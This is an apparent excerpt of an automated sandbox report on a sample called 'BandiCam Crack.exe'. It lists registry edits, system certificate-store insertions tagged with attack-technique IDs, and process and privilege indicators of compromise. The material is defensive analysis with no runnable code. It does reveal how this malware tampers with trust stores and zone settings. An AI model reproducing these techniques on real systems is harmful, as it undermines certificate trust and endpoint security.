Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ZtcNaKI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ZtcNaKI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{6aa5dca8-0000-0000-0000-d01200000000}\NukeOnDelete = "0"	ZtcNaKI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	ZtcNaKI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ZtcNaKI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	ZtcNaKI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133251256401589446"	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{6aa5dca8-0000-0000-0000-d01200000000}\MaxCapacity = "15140"	ZtcNaKI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe

Modifies registry class 4 IoCs

Processes:

chrome.exechrome.exeIC44.exechrome.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-144354903-2550862337-1367551827-1000\{B0E21D08-F483-45EC-B184-029C347267CC}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings	IC44.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-144354903-2550862337-1367551827-1000\{C275F638-70A4-4639-8BA5-673A6599FB06}	chrome.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

BandiCam Crack.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4	BandiCam Crack.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 0f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd94090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b0601050507030762000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3390b000000010000001800000045006e00740072007500730074002e006e006500740000001400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab1d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d347e000000010000000800000000c001b39667d6010300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d42000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92fea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6	BandiCam Crack.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 190000000100000010000000fa46ce7cbb85cfb4310075313a09ee050300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d47e000000010000000800000000c001b39667d6011d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d341400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab0b000000010000001800000045006e00740072007500730074002e006e0065007400000062000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3397f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b06010505070307530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd942000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92fea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6	BandiCam Crack.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	BandiCam Crack.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	BandiCam Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	BandiCam Crack.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	BandiCam Crack.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	BandiCam Crack.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exeBandiCam Crack.exeIC44.exeT5x5yJ8fvDw42wmDC6l.exepowershell.EXEFlKR.exepowershell.exepowershell.exe

pid	process
2680	chrome.exe
2680	chrome.exe
4596	chrome.exe
4596	chrome.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3308	IC44.exe
3308	IC44.exe
3308	IC44.exe
3308	IC44.exe
3308	IC44.exe
3308	IC44.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
4660	powershell.EXE
4660	powershell.EXE
4660	powershell.EXE
3308	IC44.exe
3308	IC44.exe
4076	FlKR.exe
4076	FlKR.exe
4076	FlKR.exe
4076	FlKR.exe
4076	FlKR.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
4144	powershell.exe
4144	powershell.exe
4144	powershell.exe
4976	powershell.exe
4976	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 55 IoCs

Processes:

chrome.exechrome.exe

pid	process
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

